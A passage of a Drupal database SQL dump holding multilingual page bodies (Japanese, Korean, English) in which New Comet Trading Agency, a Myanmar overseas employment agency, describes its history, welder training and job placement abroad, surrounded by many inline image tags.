data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 294, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 294, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 295, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 295, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" 